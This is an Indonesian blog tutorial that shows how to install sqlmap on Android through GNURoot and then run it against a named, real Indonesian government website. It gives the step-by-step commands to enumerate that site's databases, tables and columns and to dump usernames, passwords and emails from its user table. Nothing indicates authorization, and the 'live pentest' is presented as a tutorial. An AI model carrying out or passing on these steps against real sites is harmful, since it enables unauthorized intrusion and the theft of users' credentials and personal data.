Menjalankan sqlmap di Gnuroot

Assalamualaikum wr.wb

Hai para sobat blog Master Linuxser Kali ini admin ngasi tutor  cara menjalankan SQLMap di android

Buat kalian yang belum punya GNURoot Debian download dlu di playstore pertama pastikan GNURoot terinstall Kemudian buka GNURoot Debian nya seperti pada gambar di bawah ini.

Alangkah baiknya buat folder khusus pentest dulu untuk menampung tool-tool hacking nanti nya dengan memasukkan perintah mkdir pentest kemudian tekan enter.

kemudian masukkan ke dalam folder pentest tadi dengan memasukkan perintah cd pentest kemudian tekan enter

kemudian install SQLMap dengan memasukkan perintah

• git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap 

kemudian tekan enter

Biarkan proses instalasi berjalan

Setelah selesai masuk ke folder sqlmap dengan memasukkan perintah cd sqlmap kemudian tekan enter

beri hak akses dengan memasukkan perintah chmod 777 sqlmap.py kemudian tekan enter

kemudian update dulu sqlmap nya dengan memasukkan perintah ./sqlmap.py --update kemudian tekan enter

Mari kita coba langsung praktek live pentest dengan target nya

https://djk.esdm.go.id/index.php/detail-berita?ide=4325 dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 --dbs

kemudian tekan enter

biarkan proses scanning berjalan

Muncul wizard buat eksekusi jenis exploitasi nya ya tekan C kemudian tekan enter

biarkan proses injeksi SQL terus berjalan secara otomatis

dan database nya ketemu cek gambar dibawah biar jelas

Disini gw mau injeksi SQLnya di database djk3 untuk ngecek isi tabel SQL nya jadi perintah nya adalah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 --table

kemudian tekan enter

Setelah proses scanning selesai kemudian muncul lah tabel SQL nya dari database djk3

Disini gw mau injksi SQL di tabel djk3_user buat cek isi kolom nya dengan memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user --columns

kemudian tekan enter

biarkan proses scanning dan injeksi berjalan

 Nah klo sudah ketemu kolom nya

kemudian gw mau dump isi kolom nya djk3_user tadi dengan cara memasukkan perintah

./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user -C id,username,password,email --dump

kemudian tekan enter. 

Done 

Oke sekian dan terimakasih semoga dapat bermanfaat buat kalian semua 

Tweet

Jhon Islanskha

Adalah seorang yang senang mempelajari hal-hal baru seputar dunia Teknologi, Internet dan Bisnis Online.

Subscribe to receive free email updates: